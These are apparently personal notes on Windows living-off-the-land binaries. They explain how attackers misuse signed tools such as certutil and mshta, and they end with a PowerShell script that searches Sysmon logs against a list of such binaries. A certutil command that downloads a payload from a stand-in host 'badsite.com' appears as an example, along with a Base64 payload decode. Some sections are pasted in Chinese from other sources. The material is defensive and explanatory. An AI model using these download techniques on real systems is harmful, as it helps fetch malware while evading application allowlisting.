Win - LOLBins

[toc]

---

LOLBins - Living Off The Land Binaries

All operating systems provide a rich toolbox to achieve multiple day-to-day tasks

• like maintenance of the certificates, installation of patches and applications, management of files, and many more.
• Those tools are installed by default and available to all users without specific access rights (most of the time).
• as they are signed by the operating system, they are considered safe by default.

The problem is the following: These tools are very powerful and provide interesting features for attackers. They are used for malicious purposes. Why reinvent the wheel if an attacker has access to a tool to achieve a specific task? Let’s have a look at some tools available in every Microsoft Windows operating system. If you’re using AppLocker, they are chances that you’re allowing Microsoft signed binaries in your policy.

exe

Let’s review some example:

certutil.exe

• a tool used to work with certificates

# but it can also be used as a command-line browser to download some content from an URL:
C:\Temp> certutil.exe -urlcache -split -f "https://badsite.com/payload.exe" iambad.exe

# It can also be used to quickly decode a Base64-encoded payload:
C:\Temp> certutil -decode payload.txt payload.exe

I also mentioned several times in other diaries other looks like msbuild.exe, csc.exe, or jsc.exe that are provided by the .NET Framework. They are useful to compile code on the fly or to spawn other processes.

ping.exe

• can be used in alternative ways.

# By example to implement a pause in a script:
C:\Temp> ping -n 5 127.0.0.1
# Ping will send 5 ICMP request packets to the loopback interface, one per second. So, we introduce a pause of 5 seconds.

They are plenty of tools that could be potentially dangerous if invoked from an abnormal process (like word.exe or powershell.exe) or by a regular user.

A nice list has been compiled and made available online: The LOLBAS project

---

mshta.exe

mshta.exe Microsoft HTML Application Host

• mshta.exe is a part of Microsoft Windows Operating System which is needed to execute .HTA files.
• This program is a non-essential system process, but should not be terminated unless suspected to be causing problems.
• mshta.exe 是存放在目录 C:\Windows\System32。
• 已知的 Windows XP 文件大小为 45,568 字节 (占总出现比率 66% )，29,184 字节。
• 应用程序没有可视窗口。 总结在技术上威胁的危险度是 8% , 但是也可以参考 用户意见。

---

netsh.exe

• 是一个管理员可以用来在命令提示符处配置并监视基于 Windows 的计算机的工具。
• 使用 Netsh.exe 工具，可以将输入的上下文命令定向到适当的帮助器，然后帮助器将执行命令。
• 帮助器是个动态链接库 (.dll) 文件，它通过提供配置、监视和支持一种或多种服务、实用工具或协议，来扩展 Netsh.exe 工具的功能。

---

solution

track the usage of those tools via Sysmon and Powershell.

example

# quick script to extract interesting Sysmon events:

$lolbins = @("Atbroker.exe","Bash.exe","Bitsadmin.exe","Certutil.exe","Cmdkey.exe","Cmstp.exe","Control.exe","Csc.exe","Dfsvc.exe","Diskshadow.exe","Dnscmd.exe","Esentutl.exe","Eventvwr.exe","Expand.exe","Extexport.exe","Extrac32.exe","Findstr.exe","Forfiles.exe","Ftp.exe","Gpscript.exe","Hh.exe","Ie4uinit.exe","Ieexec.exe","Infdefaultinstall.exe","Installutil.exe","Makecab.exe","Mavinject.exe","Microsoft.Workflow.Compiler.exe","Mmc.exe","Msbuild.exe","Msconfig.exe","Msdt.exe","Mshta.exe","Msiexec.exe","Odbcconf.exe","Pcalua.exe","Pcwrun.exe","Presentationhost.exe","Print.exe","Reg.exe","Regasm.exe","Regedit.exe","Register-cimprovider.exe","Regsvcs.exe","Regsvr32.exe","Replace.exe","Rpcping.exe","Rundll32.exe","Runonce.exe","Runscripthelper.exe","Sc.exe","Schtasks.exe","Scriptrunner.exe","SyncAppvPublishingServer.exe","Verclsid.exe","Wab.exe","Wmic.exe","Wscript.exe","Xwizard.exe","Appvlp.exe","Bginfo.exe","Cdb.exe","csi.exe","dnx.exe","Dxcap.exe","Mftrace.exe","Msdeploy.exe","msxsl.exe","rcsi.exe","Sqldumper.exe","Sqlps.exe","SQLToolsPS.exe","te.exe","Tracker.exe","vsjitdebugger.exe")

Foreach($lolbin in $lolbins)
{
    Get-WinEvent -FilterHashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=1;} | ?{ $_.message -match "`r`nImage: .*$lolbin`r`n" } | %{
        [regex]$regex = "(?i)`r`n(?<image>Image: .*$lolbin)`r`n(?<args>CommandLine: .*)`r`n"
        $match = $regex.Match($_.message)

        $Out = New-Object PSObject
        $Out | Add-Member Noteproperty 'Binary' $lolbin
        $Out | Add-Member Noteproperty 'Image' $match.Groups["image"].value
        $Out | Add-Member Noteproperty 'Args' $match.Groups["args"].value
        $Out | fl
    }
}

---

ref:

• [1] https://isc.sans.edu/forums/diary/Malware+Samples+Compiling+Their+Next+Stage+on+Premise/25278
• [2] https://lolbas-project.github.io
• [3] https://gist.github.com/leoloobeek/a3a4d9af3bf7fb37b6d82a7a17e7176d
• [4] https://raw.githubusercontent.com/ion-storm/sysmon-config/master/sysmonconfig-export.xml

.